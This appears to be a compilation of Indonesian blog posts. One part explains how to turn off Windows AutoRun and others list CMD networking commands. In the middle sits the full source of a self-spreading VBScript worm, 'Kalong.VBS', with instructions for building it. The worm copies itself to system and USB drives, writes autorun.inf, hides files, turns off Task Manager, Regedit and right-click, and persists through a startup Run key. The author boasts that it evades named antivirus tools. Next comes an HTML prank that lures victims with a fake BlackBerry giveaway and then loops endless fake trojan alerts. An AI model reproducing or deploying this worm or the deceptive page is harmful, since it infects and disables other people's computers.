Cara Menonaktifkan AutoRun

Mungkin kebanyakan dari kita geram dengan autorun dalam file kita yang digunakan untuk penyebaran virus.

Cara menonaktifkan autorun.
Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk menampilkan kotak dialog Run.
Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor.
Langkah 3 : Pada kiri, panel klik ganda folder untuk memperluas dan pergi ke
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun
Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai desimal.
Langkah 6 : Tutup Registry Editor dan restart komputer.
Cara menonaktifkan autorun dengan Notepad

Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun.inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan sebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.

REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = “@ SYS: DoesNotExist”

Jalankan file tersebut, klik Yes jika ada konfirmasi.

Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berjalan secara otomatis, anda harus mencari file setup dengan manual. tapi saya pikir bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan harus menghabiskan berjam-jam membersihkannya.
lengkapnya

Virus Dengan NotePad

hehehehe kmarin saya baru dari tempat teman dan
Iseng-iseng mencolok Flash Disc temen saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//

on error resume next’//–Dim kata-kata berikut ini–//

dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”

set fs = createobject(“Scripting.FileSystemObject”)

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)

Set windowpath = fs.getspecialfolder(0)

set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)

tf.attributes = 32

set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)

tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//

‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives

‘//–Cek Drive–//

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//

set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)

tf.write rekursif

tf.close

set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)

tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)

tf.write isi

tf.close

set tf = fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes=39

end if

next

‘//–Manipulasi Registry–//

set kalong = createobject(“WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//

kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//

kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//

kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//

kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//

kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”

kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//

if check 1 then

Wscript.sleep 200000

end if

loop while check 1

set sd = createobject(“Wscript.shell”)

sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Program prank dengan HTML

Membuat  suatu tipuan prank dengan HTML terkadang juga menyenangkan, apalagi jika mengetahui si korban kebingungan karenanya, , , sekarang sata akan berbagi ilmu dari sumber yang saya dapat  , , ,
silahkan buka notepad dan ketikan script berikut :

<center>silahkan input tipe blacberry kesukaan anda <br>

nama anda akan diundi untuk mendapatkan BB gratis<br><input type="text"></input>

<p>

<html>

<head>

<script type="text/javascript">

function display_alert()

{

alert("komputer anda terkena trojan horse ! ! ! ! ! ! !")

var b=true

while (b==true)

{

alert("virus found ! ! ! ! !")

}

}

</script>

</head>

<body><input type="button" onclick="display_alert()" value="submit" /></body>

</html></center>

setelah mengetikan sript berikut maka simpanlah dengan format .html dan simpan, , , jika ingin lebih meyakinkan korban silahkan memodifikasi sendiri script ini, , ,
Ulasan ini merupakan tambahan ilmu saja , , ,sehingga jika terjadi kesalahan berlebihan maka resiko ditanggung penumpang, , , chaw and salam olahraga.

Perintah - Perintah dalam jaringan komputer dengan CMD

ADDUSERS - Memasukkan/ menambah user ke/dari file CSV.

ARP - Address Resolution Protocol

ASSOC Change - file extension associations

ASSOCIAT - One step file association

AT Schedule - Perintah untuk membuat shedule program (utk dijalankan kemudian waktu)

ATTRIB - Mengganti atribut file

BOOTCFG - Edit boot setting windows

BROWSTAT - Mencari info domain,browser dan PDC

CACLS - Mengganti/mengubah file permissions

CALL - Memanggil sebuah program batch

CD - Memindahkan ke sebuah folder tertentu.

CHANGE - Mengubah Properties pada Terminal Server

CHKDSK - Memeriksa dan memperbaiki file system

CHKNTFS - Memeriksa NTFS file system

CHOICE - Menerima input keyboard ke dalam sebuah batch file

CIPHER - Encrypt-Decrypt files/folders

CleanMgr - Membersihkan secara otomatis Temporary files, recycle bin

CLEARMEM - Membersihkan memory

CLIP - meng-Copy STDIN ke Windows clipboard.

CLS - Membersihkan layar CMD

CLUSTER - Windows Clustering

CMD - Membuka layar CMD/ command prompt

COLOR - Mengganti warna pada window CMD

COMP - Membandingkan isi dari 2 atau lebih file

COMPACT - kompres file/folder di dalam partisi NTFS

COMPRESS - kompres file individu di dalam partisi NTFS

CON2PRT - Connect atau disconnect sebuah Printer

CONVERT - Convert FAT drive menjadi NTFS.

COPY - Copy 1 atau lebih file ke lokasi tertentu

CSVDE - Import/Export Active Directory data

DATE - Menampilkan/mengatur tanggal

Dcomcnfg - DCOM Configuration Utility

DEFRAG - Defragment hard drive

DEL - Menghapus 1 atau lebih file

DELPROF - Menghapus User Profile NT

DELTREE - Menghapus sebuah folder beserta subfolder

DevCon - Device Manager Command Line Utility

DIR - Menampilkan daftar file/folder dari sebuah drive

DOSKEY - Mengedit command line,recall commands,dan create macros

DSADD - Menambah user (computer, group..) ke dalam active directory

DSQUERY - Menambah item ke dalam active directory

DSMOD - Modify user (computer, group..) di dalam active directory

EXIT - keluar dari window CMD

EXPAND - Uncompress file

EXTRACT - Uncompress CAB files

FC - Membandingkan 2 buah file

FDISK - Disk Format dan partition

FIND - Mencari sebuah text string di dalam sebuah file

FREEDISK - Menampilkan free disk space (dalam bytes)

FSUTIL - File and Volume utilities

FTP - File Transfer Protocol

FTYPE - Menampilkan/mengubah file types yg digunakan dalam file extension

GOTO - Mengarahkan sebuah program batch untuk melompat ke labelled line

KILL - Menghapus program dari memory

LABEL - Memberi/mengubah label disk

LOCAL - Menampilkan daftar anggota local groups

LOGEVENT - Menulis text ke dalam NT event viewer.

LOGOFF - Keluar dari system / Mengeluarkan user dari system

MD - Create new folders

MODE - Configure a system device

MOUNTVOL - Mengatur Mount point dalam sebuah volume

MOVE - Memindahkan file dari sebuah folder ke folder lain

MSIEXEC - Microsoft Windows Installer

MSINFO - Windows NT diagnostics

MSTSC - Terminal Server Connection (Remote Desktop Protocol)

MUNGE - Mencari dan Menganti text di dalam sebuah file (find & replace)

MV - Meng-copy file yang sedang/sementara digunakan

NET - Mengatur network resources

NETDOM - Domain Manager

NETSH - Configure network protocols

NETSVC - Command-line Service Controller

NBTSTAT - Menampilkan networking statistics (NetBIOS over TCP/IP)

NTBACKUP - Backup folders

NTRIGHTS - Edit user account rights (wilayah akses yg diizinkan oleh admin)

PATH - Menampilkan atau mengatur search path untuk executable files

PATHPING - Melacak route plus network latency dan packet loss

PAUSE - Menahan proses sebuah batch file and menampilkan message

PING - Menguji (test) network connection

POPD - Restore previous value dari sebuah directory yang di-save oleh PUSHD

PRNCNFG - Menampilkan, mengatur, atau mengubah nama printer

PRNMNGR - Menampilkan, menghapus, atau menambah daftar printer; set default printer

PROMPT - Mengubah command prompt

PsExec - Menjalankan proses jarak jauh (remote)

PsFile - Menunjukkan file2 yang dibuka dari jarak jauh

PsLoggedOn - Who's logged on (mengecek secara lokal atau melalui resource sharing)

PsLogList - Event log records

PsPasswd - Mengubah account password

PsService - Menampilkan dan mengubah services

PsShutdown - Shutdown atau reboot computer

PsSuspend - Suspend/menahan proces

PUSHD - Menyimpan/Save dan mengganti current directory

QGREP - Mencari kata/kalimat di dalam file yg sesuai dgn pola/line yg ditentukan.

RASDIAL - Mengatur RAS connections

RASPHONE - Mengatur RAS connections

RECOVER - Memulihkan/Recover damaged file dari sebuah disk defective (rusak).

REM - Merekam/mencatat comments (remarks) di dalam sebuah batch file

REPLACE - Mengganti/Replace atau meng-update sebuah file dengan file line

RDISK - Create Recovery Disk

RMTSHARE - Share folder atau printer

ROUTE - Memanipulasi network routing tables

RUNAS - Menjalankan sebuah program dgn menggunakan user account lain.

RUNDLL32 - Menjalankan sebuah DLL command (add/remove print connections)

ScriptIt - Control GUI applications

SET - Display, set, atau remove environment variables

SHOWGRPS - Menampilkan daftar NT Workgroups atau user yang telah joined

SHOWMBRS - Menampilkan daftar Users yg merupakan member dari sebuah Workgroup

SLEEP - Menunggu selama beberapa saat

SOON - Menjadwal(schedule) sebuah command untuk beberapa waktu kemudian

START - membuka sebuah window baru, untuk menjalankan program atau command tertentu

SUBINACL - Edit file & folder Permissions, Ownership serta Domain

SUBST - Menyesuaikan sebuah path dengan drive letter

SYSTEMINFO - Menampilkan daftar system configuration

TASKLIST - Menampilkan daftar aplikasi dan service yang sedang berjalan

VERIFY - Memeriksa apakah files telah ter-save

VOL - Menampilkan disk label

WHERE - Mencari dan menampilkan files di dalam sebuah directory tree

WINMSDP - Windows system diagnostics II

WMIC - WMI Commands

XCACLS - Mengubah file permissions (hak akses)

XCOPY - Copy files dan folders

Perintah - Perintah mematikan dalam CMD

Dalam CMD ada bayak parintah-perintah yang bisa membuat kita pusing jika menuliskannya,  , , contoh perintah dalam CMD dalam melacak IP address.

1. ipconfig /all
Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN.

2. ipconfig /flushdns
Menghapus DNS Cache

3. ipconfig /release
“Menghapus” semua koneksi IP Address.

4. ipconfig /renew
Membuat IP Address baru untuk adapter tertentu.

5. ipconfig /displaydns
Menampilkan DNS Cache.

6. ipconfig /registerdns
Melakukan refresh DNS dan meregister kembali koneksi DNS.

7. ipconfig /showclassid
Menampilkan informasi DHCP Class.

8. ipconfig /setclassid
Mengubah DHCP Class ID

9. control netconnections
Menampilkan Network Connection.

10. nslookup
Mengetahui alamat ip address dari nama domain yang di tuliskan

11. netstat
Menampilkan informasi koneksi TCP/IP yang sedang aktif.

12. route
Menampilkan local route.

13. hostname
Menampilkan nama komputer.

14. ping
Contoh: ping http://anjees.blogspot.com
Melakukan test koneksi ke situs http://anjees.blogspot.com
Semakin sedikit % loss-nya maka semakin baik koneksinya.


15. tracert
Menampilkan informasi IP Address route.